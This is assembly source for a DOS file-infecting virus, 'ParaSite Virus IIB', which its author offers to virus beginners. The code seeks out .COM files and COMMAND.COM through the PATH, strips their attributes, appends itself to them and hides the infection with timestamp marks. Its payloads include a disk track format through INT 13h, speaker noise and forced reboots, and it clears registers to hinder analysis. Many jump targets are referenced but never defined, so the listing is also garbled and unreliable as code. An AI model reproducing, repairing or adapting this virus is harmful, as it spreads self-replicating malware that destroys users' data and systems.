;   <PARSIT2B.ASM>   -   ParaSite Virus IIB                              
;                        By: Rock Steady                                 
;  Close to one year I created this Virus. As you can see it is quite    
;  old... Maybe too Old... But here it is... It Sucks... but its great   
;  for any virus beginner... Anyhow...                                   
;  NOTES: Simple COM infector. 10% of the time it reboots the system     
;         20% it plays machine gun noices on the PC speaker... and       
;         70% of the time is infects another COM file... Have fun...     
MOV_CX  MACRO X                                                          
        DB    0B9H                                                       
        DW    X                                                          
CODE    SEGMENT                                                          
        ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE                           
        ORG     100H                                                     
VCODE:  JMP     virus                                                    
        NOP                             ; To identify it as an Infected  
        NOP                             ; Program!                       
v_start equ     $                                                        
virus:  PUSH    CX                                                       
        MOV     DX,OFFSET vir_dat                                        
        MOV     SI,DX                                                    
        ADD     SI,first_3                                               
        JMP     Rock_1                                                   
        MOV     DX,dta                                                   
        ADD     DX,SI                                                    
        MOV     AH,1AH                                                   
        INT     21H                                                      
        PUSH    ES                                                       
        PUSH    SI                                                       
        MOV     ES,DS:2CH                                                
        MOV     DI,0                                                     
        JMP     Day_Of_Week                                              
        MOV     CX,3                                                     
        MOV     DI,OFFSET 100H                                           
        REPZ    MOVSB                                                    
        MOV     SI,DX                                                    
        PUSH    ES                                                       
        MOV     AH,2FH                                                   
        INT     21H                                                      
        MOV     [SI+old_dta],BX                                          
        MOV     [SI+old_dts],ES                                          
        POP     ES                                                       
        JMP     Rock_2                                                   
        MOV     AH,2AH                  ;Get System date!                
        INT     21H                                                      
        CMP     AL,1                    ;Check to See if it's Monday!    
        JGE     day_check               ;Jump if later than Mondays      
        JMP     Get_Time                                                 
        CMP     AL,1                    ;Check to see if it is the 1st   
        JA      Get_Time                ;If yes, create a MESS...        
        JMP     Bad_Mondays             ;If not, then go on with infecti 
          MOV   DL,2                    ;The Formatting Tracks..         
          MOV   AH,05                                                    
          MOV   DH,80h                                                   
          MOV   CH,0                                                     
          INT   13h                                                      
          MOV   CX,20d                  ;Set number of Shots             
          PUSH  CX                      ;Save Count                      
          CALL  Shoot                                                    
          MOV   CX,4000H                                                 
Silent:   LOOP  silent                                                   
          POP   CX                                                       
          LOOP  new_Shot                                                 
          JMP   mess                                                     
SHOOT     proc  near                    ;The Machine Gun Noices...       
          MOV   DX,140h                                                  
          MOV   BX,20h                                                   
          IN    AL,61h                                                   
          AND   AL,11111100b                                             
SOUND:    XOR   AL,2                                                     
          OUT   61h,al                                                   
          ADD   dx,9248h                                                 
          MOV   CL,3                                                     
          ROR   DX,CL                                                    
          MOV   CX,DX                                                    
          AND   cx,1ffh                                                  
          OR    CX,10                                                    
WAITA:    LOOP  WAITA                                                    
          DEC   BX                                                       
          JNZ   SOUND                                                    
          AND   AL,11111100b                                             
          OUT   61h,AL                                                   
Shoot     Endp                                                           
          MOV   AH,2Ch                  ; Get System Time!               
          INT   21h                     ;                                
          AND   DH,0fh                                                   
          CMP   DH,3                                                     
          JB    Play_music                                               
          CMP   DH,3h                                                    
          JA    Find_Path                                                
          INT   19h                                                      
        MOV     AH, 47H                                                  
        XOR     DL,DL                                                    
        ADD     SI, OFFSET orig_path - OFFSET buffer - 8                 
        INT     21H                                                      
        JC      find_path                                                
        MOV     AH,3BH                                                   
        MOV     DX,SI                                                    
        ADD     DX, OFFSET root_dir - OFFSET orig_path                   
        INT     21H                                                      
        MOV     [BX+nam_ptr],DI                                          
        MOV     SI,BX                                                    
        ADD     SI,f_ipec                                                
        MOV     CX,6                                                     
        REPZ    MOVSB                                                    
        JMP     hello                                                    
        POP     SI                      ; Seek and Destroy...            
        PUSH    SI                                                       
        ADD     SI,env_str                                               
        MOV     CX,OFFSET 8000H                                          
        REPNZ   SCASB                                                    
        MOV     CX,4                                                     
; The JNZ line specifies that if there is no PATH present, then we will  
; along and infect the ROOT directory on the default drive.              
        JNZ     find_path               ;If not path, then go to ROOT di 
        LOOP    check_next_4            ;Go back and check for more char 
        POP     SI                      ;Load in PATH again to look for  
        POP     ES                                                       
        MOV     [SI+path_ad],DI                                          
        MOV     DI,SI                                                    
        ADD     DI,wrk_spc                                               
        MOV     BX,SI                                                    
        ADD     SI,wrk_spc              ;the File Handle                 
        MOV     DI,SI                                                    
        JMP     SHORT   slash_ok                                         
        CMP     WORD PTR [SI+path_ad],0                                  
        JNZ     found_subdir                                             
        JMP     all_done                                                 
        PUSH    DS                                                       
        PUSH    SI                                                       
        MOV     DS,ES:2CH                                                
        MOV     DI,SI                                                    
        MOV     SI,ES:[DI+path_ad]                                       
        ADD     DI,wrk_spc              ;DI is the handle to infect!     
        LODSB                           ;To tedious work to move into su 
        CMP     AL,';'                  ;Does it end with a ; character? 
        JZ      moved_one               ;if yes, then we found a subdir  
        CMP     AL,0                    ;is it the end of the path?      
        JZ      moved_last_one          ;if yes, then we save the PATH   
        STOSB                           ;marker into DI for future refer 
        JMP     SHORT   move_subdir                                      
        MOV     SI,0                                                     
        POP     BX                      ;BX is where the virus data is   
        POP     DS                      ;Restore DS                      
        MOV     [BX+path_ad],SI         ;Where is the next subdir?       
        CMP     CH,'\'                  ;Check to see if it ends in \    
        JZ      slash_ok                ;If yes, then it's OK            
        MOV     AL,'\'                  ;if not, then add one...         
        STOSB                           ;store the sucker                
        MOV     [BX+nam_ptr],DI         ;Move the filename into workspac 
        MOV     SI,BX                   ;Restore the original SI value   
        ADD     SI,f_spec               ;Point to COM file victim        
        MOV     CX,6                                                     
        REPZ    MOVSB                   ;Move victim into workspace      
        MOV     SI,BX                                                    
        MOV     AH,4EH                                                   
        MOV     DX,wrk_spc                                               
        ADD     DX,SI                   ;DX is ... The File to infect    
        MOV     CX,3                    ;Attributes of Read Only or Hidd 
        INT     21H                                                      
        JMP     SHORT   find_first                                       
        JMP     go                                                       
        MOV     AH,4FH                                                   
        INT     21H                                                      
        JNB     found_file              ;Jump if we found it             
        JMP     SHORT   set_subdir      ;Otherwise, get another subdirec 
        MOV     AX,[SI+dta_tim]         ;Get time from DTA               
        AND     AL,1EH                  ;Mask to remove all but seconds  
        CMP     AL,1EH                  ;60 seconds                      
        JZ      find_next                                                
        CMP     WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too LON 
        JA      find_next               ;If too long, find another one   
        CMP     WORD PTR [SI+dta_len],0AH ;Is it too short?              
        JB      find_next               ;Then go find another one        
        MOV     DI,[SI+nam_ptr]                                          
        PUSH    SI                                                       
        ADD     SI,dta_nam                                               
        CMP     AL,0                                                     
        JNZ     more_chars                                               
        POP     SI                                                       
        MOV     AX,OFFSET 4300H                                          
        MOV     DX,wrk_spc                                               
        ADD     DX,SI                                                    
        INT     21H                                                      
        MOV     [SI+old_att],CX                                          
        MOV     AX,OFFSET 4301H                                          
        AND     CX,OFFSET 0FFFEH                                         
        MOV     DX,wrk_spc                                               
        ADD     DX,SI                                                    
        INT     21H                                                      
        MOV     AX,OFFSET 3D02H                                          
        MOV     DX,wrk_spc                                               
        ADD     DX,SI                                                    
        INT     21H                                                      
        JNB     opened_ok                                                
        JMP     fix_attr                                                 
        MOV     BX,AX                                                    
        MOV     AX,OFFSET 5700H                                          
        INT     21H                                                      
        MOV     [SI+old_tim],CX         ;Save file time                  
        MOV     [SI+ol_date],DX         ;Save the date                   
        MOV     AH,2CH                                                   
        INT     21H                                                      
        AND     DH,7                                                     
        JMP     infect                                                   
        MOV     AH,3FH                                                   
        MOV     CX,3                                                     
        MOV     DX,first_3                                               
        ADD     DX,SI                                                    
        INT     21H             ;Save first 3 bytes into the data area   
        JB      fix_time_stamp                                           
        CMP     AX,3                                                     
        JNZ     fix_time_stamp                                           
        MOV     AX,OFFSET 4202H                                          
        MOV     CX,0                                                     
        MOV     DX,0                                                     
        INT     21H                                                      
        JB      fix_time_stamp                                           
        MOV     CX,AX                                                    
        SUB     AX,3                                                     
        MOV     [SI+jmp_dsp],AX                                          
        ADD     CX,OFFSET c_len_y                                        
        MOV     DI,SI                                                    
        SUB     DI,OFFSET c_len_x                                        
        JMP     CONT                                                     
        JMP     JOE1                                                     
        MOV     [DI],CX                                                  
        MOV     AH,40H                                                   
        MOV_CX  virlen                                                   
        MOV     DX,SI                                                    
        SUB     DX,OFFSET codelen                                        
        INT     21H                                                      
        JB      fix_time_stamp                                           
        CMP     AX,OFFSET virlen                                         
        JNZ     fix_time_stamp                                           
        MOV     AX,OFFSET 4200H                                          
        MOV     CX,0                                                     
        MOV     DX,0                                                     
        INT     21H                                                      
        JB      fix_time_stamp                                           
        MOV     AH,40H                                                   
        MOV     CX,3                                                     
        MOV     DX,SI                                                    
        ADD     DX,jmp_op                                                
        INT     21H                                                      
        MOV     DX,[SI+ol_date]                                          
        MOV     CX,[SI+old_tim]                                          
        AND     CX,OFFSET 0FFE0H                                         
        OR      CX,1EH                                                   
        MOV     AX,OFFSET 5701H                                          
        INT     21H                                                      
        MOV     AH,3EH                                                   
        INT     21H                                                      
        MOV     AX,OFFSET 4301H                                          
        MOV     CX,[SI+old_att]                                          
        MOV     DX,wrk_spc                                               
        ADD     DX,SI                                                    
        INT     21H                                                      
        PUSH    DS                                                       
        MOV     AH,1AH                                                   
        MOV     DX,[SI+old_dta]                                          
        MOV     DS,[SI+old_dts]                                          
        INT     21H                                                      
        POP     DS                                                       
        MOV     BX,OFFSET count                                          
        CMP     BX,0                                                     
        JB      joe2                                                     
        POP     CX                                                       
        XOR     AX,AX                   ;XOR values so that we will give 
        XOR     BX,BX                   ;poor sucker a hard time trying  
        XOR     DX,DX                   ;reassemble the source code if h 
        XOR     SI,SI                   ;decides to dissassemble us.     
        MOV     DI,OFFSET 0100H                                          
        PUSH    DI                                                       
        XOR     DI,DI                                                    
        RET     0FFFFH                  ;Return back to the beginning    
                                        ;of the program                  
vir_dat EQU     $                                                        
Aurther DB      "ParaSite IIB - By: Rock Steady"                         
olddta_ DW      0                                                        
olddts_ DW      0                                                        
oldtim_ DW      0                                                        
count_  DW      0                                                        
oldate_ DW      0                                                        
oldatt_ DW      0                                                        
first3_ EQU     $                                                        
        INT     20H                                                      
jmpop_  DB      0E9H                                                     
jmpdsp_ DW      0                                                        
fspec_  DB      '*.COM',0                                                
fipec_  DB      'COMMAND.COM',0                                          
pathad_ DW      0                                                        
namptr_ DW      0                                                        
envstr_ DB      'PATH='                                                  
wrkspc_ DB      40h dup (0)                                              
dta_    DB      16h dup (0)                                              
dtatim_ DW      0,0                                                      
dtalen_ DW      0,0                                                      
dtanam_ DB      0Dh dup (0)                                              
buffer  DB      0CDh, 20h, 0, 0, 0, 0, 0, 0                              
orig_path DB    64 dup (?)                                               
root_dir DB     '\',0                                                    
lst_byt EQU     $                                                        
virlen  =       lst_byt - v_start                                        
codelen =       vir_dat - v_start                                        
c_len_x =       vir_dat - v_start - 2                                    
c_len_y =       vir_dat - v_start + 100H                                 
old_dta =       olddta_ - vir_dat                                        
old_dts =       olddts_ - vir_dat                                        
old_tim =       oldtim_ - vir_dat                                        
ol_date =       oldate_ - vir_dat                                        
old_att =       oldatt_ - vir_dat                                        
first_3 =       first3_ - vir_dat                                        
jmp_op  =       jmpop_  - vir_dat                                        
jmp_dsp =       jmpdsp_ - vir_dat                                        
f_spec  =       fspec_  - vir_dat                                        
f_ipec  =       fipec_  - vir_dat                                        
path_ad =       pathad_ - vir_dat                                        
nam_ptr =       namptr_ - vir_dat                                        
env_str =       envstr_ - vir_dat                                        
wrk_spc =       wrkspc_ - vir_dat                                        
dta     =       dta_    - vir_dat                                        
dta_tim =       dtatim_ - vir_dat                                        
dta_len =       dtalen_ - vir_dat                                        
dta_nam =       dtanam_ - vir_dat                                        
count   =       count_  - vir_dat                                        
         CODE    ENDS